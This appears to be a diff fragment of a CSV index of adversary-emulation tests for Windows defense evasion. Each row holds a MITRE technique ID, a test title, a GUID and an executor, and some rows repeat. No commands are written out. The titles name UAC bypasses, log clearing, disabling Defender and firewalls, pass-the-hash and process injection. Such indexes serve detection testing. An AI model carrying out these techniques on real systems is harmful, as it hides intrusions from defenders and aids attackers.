defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
defense-evasion,T1070.003,Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1070.001,Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1218.001,Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
@@ -237,22 +87,15 @@ defense-evasion,T1218.001,Compiled HTML File,5,Invoke CHM Simulate Double click,
defense-evasion,T1218.001,Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.002,Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
defense-evasion,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information,dc6fe391-69e6-4506-bd06-ea5eeb4082f8,command_prompt
defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode,71abc534-3c05-4d0c-80f7-cbe93cb2aa94,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell
defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,5,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Disable Windows Event Logging,6,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
@@ -272,11 +115,6 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco
defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
@@ -285,21 +123,12 @@ defense-evasion,T1070.004,File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5
defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
defense-evasion,T1564.001,Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1553.004,Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
defense-evasion,T1218.004,InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
defense-evasion,T1218.004,InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
@@ -308,51 +137,14 @@ defense-evasion,T1218.004,InstallUtil,5,InstallUtil Uninstall method call - /U v
defense-evasion,T1218.004,InstallUtil,6,InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant,06d9deba-f732-48a8-af8e-bdd6e4d98c1d,powershell
defense-evasion,T1218.004,InstallUtil,7,InstallUtil HelpText method call,5a683850-1145-4326-a0e5-e91ced3c6022,powershell
defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
defense-evasion,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1553.005,Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks,58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -362,18 +154,9 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from
defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
defense-evasion,T1218.007,Msiexec,4,Msiexec.exe - Execute Local MSI file with an embedded EXE,ed3fa08a-ca18-4009-973e-03d13014d0e8,command_prompt
defense-evasion,T1218.007,Msiexec,5,WMI Win32_Product Class - Execute Local MSI file with embedded JScript,882082f0-27c6-4eec-a43c-9aa80bccdb30,powershell
defense-evasion,T1218.007,Msiexec,6,WMI Win32_Product Class - Execute Local MSI file with embedded VBScript,cf470d9a-58e7-43e5-b0d2-805dffc05576,powershell
defense-evasion,T1218.007,Msiexec,7,WMI Win32_Product Class - Execute Local MSI file with an embedded DLL,32eb3861-30da-4993-897a-42737152f5f8,powershell
defense-evasion,T1218.007,Msiexec,8,WMI Win32_Product Class - Execute Local MSI file with an embedded EXE,55080eb0-49ae-4f55-a440-4167b7974f79,powershell
defense-evasion,T1218.007,Msiexec,9,Msiexec.exe - Execute the DllRegisterServer function of a DLL,0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d,command_prompt
defense-evasion,T1218.007,Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
defense-evasion,T1218.007,Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
defense-evasion,T1564.004,NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
defense-evasion,T1564.004,NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
@@ -381,15 +164,9 @@ defense-evasion,T1564.004,NTFS File Attributes,4,Create ADS PowerShell,0045ea16-
defense-evasion,T1070.005,Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1070.005,Network Share Connection Removal,4,Disable Administrative Share Creation at Startup,99c657aa-ebeb-4179-a665-69288fdd12b8,command_prompt
defense-evasion,T1070.005,Network Share Connection Removal,5,Remove Administrative Shares,4299eff5-90f1-4446-b2f3-7f4f5cfd5d62,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -398,15 +175,11 @@ defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from
defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
@@ -414,7 +187,6 @@ defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449a
defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
